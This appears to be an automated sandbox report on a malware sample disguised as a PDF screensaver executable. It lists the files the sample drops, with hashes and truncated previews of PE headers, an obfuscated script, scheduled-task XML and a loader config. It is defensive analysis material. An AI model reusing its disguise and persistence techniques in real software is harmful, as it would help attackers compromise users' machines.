              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@......................................@...@.......@.........................|....P..4............~..X&...`..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...4....P......................@..@.reloc..Pv...`...x..................@..B................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\itgtrnq.icm

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):578
              Entropy (8bit):6.208581968969855
              Encrypted:false
              SSDEEP:
              MD5:18D244E2DA84E8B08621DB3D2C714ECE
              SHA1:7C03348C271C40E02418075E5678A5906576C280
              SHA-256:592477758051ED96DBCF1300248BD10B1F800287D7E0AFD8012A7D4B446E4C91
              SHA-512:671FEA619563C02F32E0458CE15062BE3F9404A795F763EDEB2934CA0DA24B5487AE721D9CA1B4A5B056E8FB1B8684EF45F7E90519DD6EBF4C90143E01A628E5
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\jdcefmmt.exe

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):701
              Entropy (8bit):6.217263929891554
              Encrypted:false
              SSDEEP:
              MD5:03224F8D3517549E40641731A5211E8D
              SHA1:C9FC0CCFAB73A464DABE64D52737D86ED47DE581
              SHA-256:9FA367942F2C23664CBC8498A334C716F26BF2C1732A5C9490876CBAA3944F6E
              SHA-512:B0E1BE6303B1BB5426F9F0F40AF342544CDD393783F87108B63C5216FAB128FE5AB25561515CECAEE0FA1572A5C8227B08C49E11E18ECFDC08E58A653DE9A743
              Malicious:false
              Reputation:unknown
              Preview:...................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\jvhiixkk.ini

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):549
              Entropy (8bit):6.213056313966432
              Encrypted:false
              SSDEEP:
              MD5:9FFFAA49E0C74C82366B031E8D873414
              SHA1:B71020F66B4D55066C04A5504425649B93DC78F2
              SHA-256:251A281F2856F3CFEC0FD3472028E9ED3AEB5EF558CCAC820EA67C9E8524FE6A
              SHA-512:3E103990CFD5057E9D9B9095805227B226DA59DA4974E237046D1D98653E3C67629DC74C6C0647FFE0A9E8EFAE2F4999E1C2C9EFB2B5C8081879D895CC9A41AA
              Malicious:false
              Reputation:unknown
              Preview:............................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\kcvtlxr.xml

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):620
              Entropy (8bit):6.222206344450024
              Encrypted:false
              SSDEEP:
              MD5:DDC613AF180A41E7B305D2D26E77AED6
              SHA1:682E34C9A6D1A245798B44BE73D47399CBFC60A3
              SHA-256:A0B85CAEE9398B79BB9D7BE632FC2CA14A4E53204A8ECCA296C8CF25C9BAC7F4
              SHA-512:B6A7931AC3281005313641C9D1C3472E4E4646BC63A7B559A6CA911ACD959CF9D07B802E8F919F8DDAA995E61F0B9DEB57BA3C21EE9886D03360C6B1E905E0FB
              Malicious:false
              Reputation:unknown
              Preview:............................................................B........................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\kjwnj.pdf

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):636
              Entropy (8bit):6.245326274571603
              Encrypted:false
              SSDEEP:
              MD5:A70B8C03B325053D2F0A2051E3D566B7
              SHA1:E1A9CB6F876034FCD418A94D1A201DFE26631399
              SHA-256:CA9CD4CDD48DFFDDE0F6418CD08766E00E842634CC615D636540ED30CFD3C433
              SHA-512:8C5F1A8DF42EE671DE09C3D86F1B579B424C4D78E719EF96EE2B88B07DA04FAA1F0F92CDCDE4B4A25A616BD0F6F134A8636C5701E78D3747CBAA9A5F901E2B8B
              Malicious:false
              Reputation:unknown
              Preview:............................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\laklj-aowdkfxknm.xml.vbe

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):46328
              Entropy (8bit):7.200808834838652
              Encrypted:false
              SSDEEP:
              MD5:E3A50ED6D88E9A241C5F8A38C74B75A5
              SHA1:DF2C2FAA8BB5C3D9B14D9A8CDBBF7E86F4F5034A
              SHA-256:E65F26F6FDABF467EE52D7466856CC152B9ECC355596FEBB34E5910413A2CD6D
              SHA-512:4714A1F10420EA1BED67ABA05B4D1E45D48D2BC2944CCCA93F1CB5F7B32F23147D869B6865E4B0A5D703D1F886C650907A4633EBDE9455A84BCC8065DEA18C77
              Malicious:false
              Reputation:unknown
              Preview:..'..9..3....h.>...}...] .....].o.RG^....n?Z.h=.k.([._....H..Q..7.4.].x..c.?..k...dd..Qp` ........i.>..d..........@o.?~.z.x.....'.Z.c.c.h.c.B.9.5.4.N.9.p.c.9.9.E.8.9.w.V.E.6.r.3.2.1.Y.4.3.Q.5.d.9.4.8.0.9.2.X.5.4.S.x.1.7.B.A.y.W.w.....'.4.Z.6.8.1.5.X.4.9.Y.F.2.6.S.8.M.C.8.8.2.1.p.z.1.7.9.....'....R).....s....Q..*.;..G.o.Sb....6...$.{r7Z......@..TK..5).........GnS.&k.o...F..h.P..+.|......f^J..(m......._.5....$....b8!n...M..R..~{...Q..#\....T..e.yJ...I.......W[@...r..F*.Z.....ipr....'.w.A.U.3.C.4.0.a.h.o.J.1.A.W.0.8.2.D.e.I.S.8.N.4.0.6.J.2.1.5.U.C.V.1.0.s.8.U.L.G.7.1.8.i.K.C.0.....'.5.X.w.z.0.2.W.3.y.R.4.h.3.W.n.M.1.S.a.3.3.k.X.6.J.S.A.t.....'.6.4.i.8.L.T.I.8.a.7.i.D.4.8.U.0.n.5.V.7.b.s.e.g.1.....'..Q./........nA*.._U.-..t.:+.H.Yeq.(......E..Pg....LI.....K.@AkY..% "......n.4K@'.'...K....MC.|..l.Y.f.......z8.Z.G<!....'.J......[.....v..%TKerW~...J..J2YP.m|...N].IN.....g....Py....4."<%.U..+.._.L..t.I.....r..B.6.B....v?/.F.....a....~=.e....W":.....K.T...bkB,...9k#y

              C:\Users\user\AppData\Local\Temp\Folder10_51\lpolln.ini

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):632
              Entropy (8bit):6.226044296719832
              Encrypted:false
              SSDEEP:
              MD5:32C554BAC7052BFF5BBB4E69058154E4
              SHA1:A46476E21653B14423F462D7C3CF6EC16199A204
              SHA-256:B4BFAAF128F118F5B45AAEDC20246B3517926363C75DA64EBEF63D648FCBAC08
              SHA-512:D74B0DEDAC5A006E06CE5A9D7F91C1AC4FE5E4D355EC7A9F8F8683CDB83D4E584A47937D8B3C58198FC85A4C2F14261953B527E79204A53E64C3F6B9B3FB51BD
              Malicious:false
              Reputation:unknown
              Preview:...................................... ..................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\mttapgts.dll

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):535
              Entropy (8bit):6.223028920694769
              Encrypted:false
              SSDEEP:
              MD5:C32315E0688E0A5633A0D2DCE4CC9629
              SHA1:F581EE1E102167C604CF366415105BB9314CF4B5
              SHA-256:E92602D9F89967C956CA83477F419BF1F5F917D95E3C0501BD6EA1BF76E85808
              SHA-512:F5FFC31716F87A024883845607BE750FF782F114C3EC76378F6A78255857A47C9929EBDDBC9325CBE1D35887FAED615F1874320326C40215EFBE2A99193E2BF4
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\nkbixmwpld.ppt

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):656
              Entropy (8bit):6.264380029804187
              Encrypted:false
              SSDEEP:
              MD5:194DE31777DD53F9E29A06776AE6C1B3
              SHA1:A4FF9EF9C4962628810B38368D4EFB13F53449D7
              SHA-256:90EA34BF2E24E4AD5DF9FD37CEA36ABB7784931028F401F98A2E6C2A10B5583E
              SHA-512:637EAED24EB4EF8A4EE96BFAF11524901799DC8FBFD2DFDB3B478521B99BE49D056A9745388AC29A70A54390A449FC493B6F9CA5E00095DBDB192FA236B1C9B1
              Malicious:false
              Reputation:unknown
              Preview:..................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\opmotkfi.msc

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):584
              Entropy (8bit):6.2507180834396046
              Encrypted:false
              SSDEEP:
              MD5:F87E4604F5916FF6A25186B0B504E681
              SHA1:DB2989E8ED40A5CEED078473341C5D8B8FE4E0F7
              SHA-256:0A8B1D99032C6B90054E5ADF89EFA61D005B0F3E12DA48905051067ED906D529
              SHA-512:9CDD4285C8B9CF1C90BD9A73071C839D933EE44149E8CE689AA1ADE39056EAFD9CBBF348AC8BD5340A2DF7E8D91AE0529E872C377FA90DE46FB698395A8D9152
              Malicious:false
              Reputation:unknown
              Preview:...........................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\riviu.pdf

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):733
              Entropy (8bit):6.231676397919319
              Encrypted:false
              SSDEEP:
              MD5:DD66397E376C91D7F01F231D944C8DF1
              SHA1:8C2F651AF93B763090395AED51C2E551942DFEC3
              SHA-256:FF281486360AD0A5E071BFAE276626E80D212EA65AFBD3CA7784B0F4B3570D09
              SHA-512:7E81472C48AF0D9712068FB66500253F673629A313AF680071E8C8C961CB27D589F249AD688292259E384E4BCFC48161E901C6CB27659E16B42242C1E1CF2238
              Malicious:false
              Reputation:unknown
              Preview:.................................................................%..........................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\rjfwh.icm

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):530
              Entropy (8bit):6.220144182081156
              Encrypted:false
              SSDEEP:
              MD5:7FFF06723AFA9FC84547B1E2D379AABD
              SHA1:4929D1A9298E365087EFDD2B019C05F6CF750E70
              SHA-256:B26D7992C99861FEE8E8E86614AF8A0B145AE8F2AEA197CE6BA8408EF07B9698
              SHA-512:538759223E6C9DEFE1F50B1AFF4C44CDDAF21C0712C51271E44431683C6E7F632F57800909CB48B7A0C26A02DDE11549FD996DFEDE8B50C97731CCB77B24EA3B
              Malicious:false
              Reputation:unknown
              Preview:......................................*................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\sdhmdt.msc

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):581
              Entropy (8bit):6.223635486991566
              Encrypted:false
              SSDEEP:
              MD5:B74B8AC3F96B39CC953D1BA34CB751DD
              SHA1:48050CB8EA9C5A3B5108706C987799673A1454FC
              SHA-256:A3FB7C9084245E0939340B7ABBFA54C7AE7367CCF3D5E134EAA847E1EA453AEC
              SHA-512:A7F912456131E21627C14DADD6DF84AA9642006191D60A7E0B486B3850B8B0B63F87C559C5257344C98917501289782DFFC9347670B265C908CFDAEB0CDCCAE4
              Malicious:false
              Reputation:unknown
              Preview:............................................................................................................................................................j.............................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\taon.jpg

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):501
              Entropy (8bit):6.190656898709683
              Encrypted:false
              SSDEEP:
              MD5:4171BED3F16A92882815F61417AB975A
              SHA1:97A4483C79036BE8148C6169C7CCFF080742F40C
              SHA-256:E5F2CF9586AA8F0634FEE2474D46BCF6030846F0B4A02FED80F65700FCA8F0F8
              SHA-512:59566FBFDF44FE734293BF1E1DC1FAC5A63D4458E858EA05B602F56613257F99DEEBB4C7D961169A01C774DAC87A1BA35C020B7FB9FF327970E60973661A109C
              Malicious:false
              Reputation:unknown
              Preview:............................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\tuhvewrqqk.xml

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):514
              Entropy (8bit):6.214291435583763
              Encrypted:false
              SSDEEP:
              MD5:55F643ECFE99B550B4823D0DB2E473C1
              SHA1:1DE1E7E890127FBCE7DCC4283B1F0ED2073071B8
              SHA-256:3283E76A48819F103CA6F2E58AB9911EF46DA4A6438E9CD37FD0628E0F664E17
              SHA-512:02B7C643A796B8B88CA0E3EE20024E15F13E0BB25B1A08F331408D0405EE39A478728365D61FC722356F73058050FD2230C28600076A8DCFCADEAC9BE1066863
              Malicious:false
              Reputation:unknown
              Preview:........................................................................P.......................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\usvv.dll

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.170181324269657
              Encrypted:false
              SSDEEP:
              MD5:42788E9A82626033D1C890FEC1616027
              SHA1:4BC3D32071130B8830BA6999CAB6E836AFA741A6
              SHA-256:60B95B214023625539B917062F51833E9923711321185E7702ECCF0F9E16B256
              SHA-512:0334DB3EDE8EA3CB5107527EE5F162EFA37CE7C4CDBB168361614A6300443C0BDCF03590340C0E985882DA20C66717CC585F8621758AA81A9953BA04BA7ACCFB
              Malicious:false
              Reputation:unknown
              Preview:....................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\utxniv.icm

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):583
              Entropy (8bit):6.261328591888464
              Encrypted:false
              SSDEEP:
              MD5:E5450ED1310BAA27DF96331533B7116A
              SHA1:8F6F7C76A308B213EF39DE070CD3DF23B90EC209
              SHA-256:B5A1C32F1B74BD9BC40CB515B88DD0B1C0FB449DABC9E93AC75C581F111EEFB3
              SHA-512:519BE0EAFDBCD915E4C404F11DA4A713364BDF2EB4A2ADAD0E0CC16E3B0AA634C5AD0A5F498CCE8E3193365BDE1635154F054B4D54E4BF47EA6ACBA6F041A459
              Malicious:false
              Reputation:unknown
              Preview:...........................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\uvoxoq.jpg

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):753
              Entropy (8bit):6.265094025870397
              Encrypted:false
              SSDEEP:
              MD5:61F20CA5A3C48D6323D19BEB700DE2F4
              SHA1:FEC46018E797396868619396016CC00F3E9F0D7D
              SHA-256:8637DDC34CC6276D56738F219D8AD4EB4BBF73D80CEE16AA0C686B96E49031A2
              SHA-512:AD6CABC216D4F5212FC3AA7EDAD6289E6CBE4C6E7336E804083D0E8AB390F6554E088B735761A6F3E1D7D9F93737EA0D2E32FB02B7ECD787EF6F5BDC4984044A
              Malicious:false
              Reputation:unknown
              Preview:.........f..........................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\vkeewq.txt

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):530
              Entropy (8bit):6.201022804655084
              Encrypted:false
              SSDEEP:
              MD5:3D1A20AE25ACA76918F525813753BB90
              SHA1:40EF954835A5E919E13155803E422FCB59A4D6E7
              SHA-256:72B7AA6124893C2A087D1691D2C7AD052903E028BEE451F5350C7BFFA2C50AD5
              SHA-512:706116CECE24D60C06B4691FF94B01BB7811165D6003CD7829CD32C9F791DEB2FC30753E9FEE794A1947CB422BCA69E7A5E6C90C8BCC07FA7598C579D185ADD3
              Malicious:false
              Reputation:unknown
              Preview:.......................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\vlsdwgv.docx

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):510
              Entropy (8bit):6.227023728555456
              Encrypted:false
              SSDEEP:
              MD5:BF8C92BF8491E4783B72B4CCDA5E91BB
              SHA1:7D3E0FE500A79523FCB5C9E636E3B399C0FD8CA9
              SHA-256:B7FDCD17F59F82AD25996F0D1DB018624A51022D94780493A4AB98047C2EA7A3
              SHA-512:42092933F616ED495EE9D2DB9C5C40C34DA55DFE9E9A74A832DED06106EE0BF142AE220780BE2E820C97878A6B88BAFF450B66C89966D02F73F659974BD7A3BF
              Malicious:false
              Reputation:unknown
              Preview:...................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\wfccrina.ini

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):34981
              Entropy (8bit):5.585572477462829
              Encrypted:false
              SSDEEP:
              MD5:923021E60F76E22DF3997015A75D2DE2
              SHA1:0BF1F4312CB742E0FD3AA4797CD68839DD50EB86
              SHA-256:AC7EB1744189B9B145C3056E7847B5C17F27ED32BB66E05C5B7AE5CA024866B3
              SHA-512:C9E2B8BD11CF6DC78AF257148ABF0E0126FFE55130E6A80F63DEB33FA320B7048C6AFADDFEB692BD5D747D47D0EAD7EB45B203E62BB4F085567AB7E3E503200B
              Malicious:false
              Reputation:unknown
              Preview:oL0826i1j1u..0f8r26zx431oHqN82gD145xd6x0E8YWVM650gXWc0rm8V095vib1Vsg1ph8EKi5D7y..0173r5904j1898hnZJb026fa4507MCD53T3vXI2e2hbI70s9i3zLKNVc5p3xW22..vn1x706pd349Btai6yHA162L25q1UP68785556E35xTBkR10GQ34sD9KF685..Mzu91s391IX01TMyJx7274d68P3gcZjpy8K953..THq58775p06yPBeXyG02646wz345m9..s99120P1V9hdVZ3clCMqTD28Of780zY4DzQ37cN134g91N686gb482862..4i8uy6nx2A2M54dp79IL4G13clh3V02K96F56zVemX8..W7687B9MDnbR9vwrauSB6VulPly512506f5cfUC95D6277z44oQa7693845g52AVt3..0u2yc89702DWG392FIgnM8ffH6KdQ0A..jbmz085IBt5747RXzqI96174BEbEg3FCq97V39DTc75b6E776P5Lv658L..78718M9c92LxuBRb1d6k..6L7d8elyRl47L0K3hOHKb7k4I70T0A3l9zv22464RI..6K1Vi3jmT54uR8nrL1dc3w068ZH4rw6L9..Pg8qeyhfwbbcBAp51Wap0PsJET4909M3Vb6R39EMbyM3B5h8ye1q6V1..8ZA5K6d89Y18oh2rx3f98oWa23O2RIx0qErnm6489d9n9kq6Fj79t3O79uKm7541..Xi640jzRer6E56F83Va2B6uq39s5Ygif1oQY48J7hJ59331174QK265544201w9uNUm0gy0Zulw9..2X94fc65x4j53AD7A50N27n3Znl164U25O18689190M78a2IK..7FP81La529Q702RX0e8w02950u2V6UfP85Fr9U5uv48U183T2U90W79UL10o860dF2q264..o1JI2X27358f15m9M8..195dc62uVyg

              C:\Users\user\AppData\Local\Temp\Folder10_51\whonujk.xml

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.245277588351939
              Encrypted:false
              SSDEEP:
              MD5:6A372892797F0436A2022B5C0D051DDF
              SHA1:D2138DA84C4D4469393DAF6B309C699D3776835B
              SHA-256:7E732B89FD4BA6996C2FEFB7DB6DA5BDE6B85E6BC44F7EA21DAA62992AE6A61A
              SHA-512:F25D9D07788FCB898C9174F06CFD76FC86F5CDD1202463BFA431CD7DCF72BD4B3616D3EF6F1B373898E551B515771F2A8DF8ED7E199982B0BC89AB06C0C40151
              Malicious:false
              Reputation:unknown
              Preview:....................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\wuqc.docx

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):704
              Entropy (8bit):6.242209133425222
              Encrypted:false
              SSDEEP:
              MD5:30766DEDBDECAFF845571EEA5F3B21E4
              SHA1:514644B945925EEEE525AF9A8737277954B89288
              SHA-256:084034C5553C3DC615FA87DD84E10679480C16460B6A7F2EF3C5D8B0943683DD
              SHA-512:9CA41F1331CDBDE97DFFE697D3500117AB4DB8D19A12A900910CF8AF0526CEF5311295E10B3464FAA1451B3F6C8E445B8C48360FDDF239DAEF5E4651B76D6E60
              Malicious:false
              Reputation:unknown
              Preview:..................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\RegSvcs.exe

              Download File
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:modified
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:true
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

              C:\Users\user\AppData\Local\Temp\tmpA401.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1311
              Entropy (8bit):5.120237537969728
              Encrypted:false
              SSDEEP:
              MD5:9CC9B31561289BF47DDBEF114BE4B6FA
              SHA1:C901987D5F8BBAD7231B7EE4A65ADB93BB0F56A5
              SHA-256:984AA44429B06B17C290376A8D741A2DAE62FE6F38EEBBF434A0781230686097
              SHA-512:075F148FDD9187FDD6BA56D1CD3D81641FE8D8F9FBA903F98B307463B4BCDC77556B542CFD73C9BC2C34D364245D5B8080DE69DC968DE9070D44FE180741D4FC
              Malicious:true
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

              C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1310
              Entropy (8bit):5.109425792877704
              Encrypted:false
              SSDEEP:
              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:data
              Category:dropped
              Size (bytes):8
              Entropy (8bit):3.0
              Encrypted:false
              SSDEEP:
              MD5:51BBBB873C030E460FAD17FEDABBC3AB
              SHA1:5CC4E4B44A56143A4634286AA9E05F8607426C06
              SHA-256:AF3FBBF96097D55438E4F0F623AB560923B3E01927AC132EEA4D194DF8D96F42
              SHA-512:FAB50F156C07AF56AD56024C5E3E9443F1E31A524EAE3EA50BA699AC7CDEF7EE8BA65219E2A10F24F42D025C1080787F847CDE081FD21D10649D86B89516AB8B
              Malicious:true
              Reputation:unknown
              Preview:Y.;hR..H

              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):48
              Entropy (8bit):4.556127542695029
              Encrypted:false
              SSDEEP:
              MD5:71C86F4534ED6EA4C1E9A785F2EB0A92
              SHA1:D065F0540580FC2E0ACD365784FD5A60F8235829
              SHA-256:DBC475B81DC4AACF70235516B8FB463D4FB170C3E72E647C0BA2A30D3B9EC4E3
              SHA-512:6D97D624C0A2B3D3B8D51A4F2502B8874E59E29538AD0477F1DE32FEEDAE38890F68532B591EEF0FA0DB23CD4929890DB256ACB8E4B73F6F790BB11C13473688
              Malicious:false
              Reputation:unknown
              Preview:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe

              C:\Users\user\temp\wfccrina.ini

              Download File
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):91
              Entropy (8bit):5.006199003780079
              Encrypted:false
              SSDEEP:
              MD5:AEF559A1D83E37D78B012A94CCE85889
              SHA1:44228F31FBDA6D787CD91E082E8EF769A23B37AA
              SHA-256:637F2CAB19C58F9E961062E379089A4DCDDCA806EA439BC8C0E63285DEC9F294
              SHA-512:235B7E78EBFFC6640E9476A85C3FD528A4C420F62DCA2AD7FA8C8105669B3278DEDBD50E51B73A7344775C7B9C076594DFDC91FD3857875278066039B91D9A9C
              Malicious:false
              Reputation:unknown
              Preview:[S3tt!ng]..stpth=%localappdata%\temp..Key=Chrome..Dir3ctory=Folder10_51..ExE_c=ihgsvw.exe..

              \Device\ConDrv

              Download File
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1141
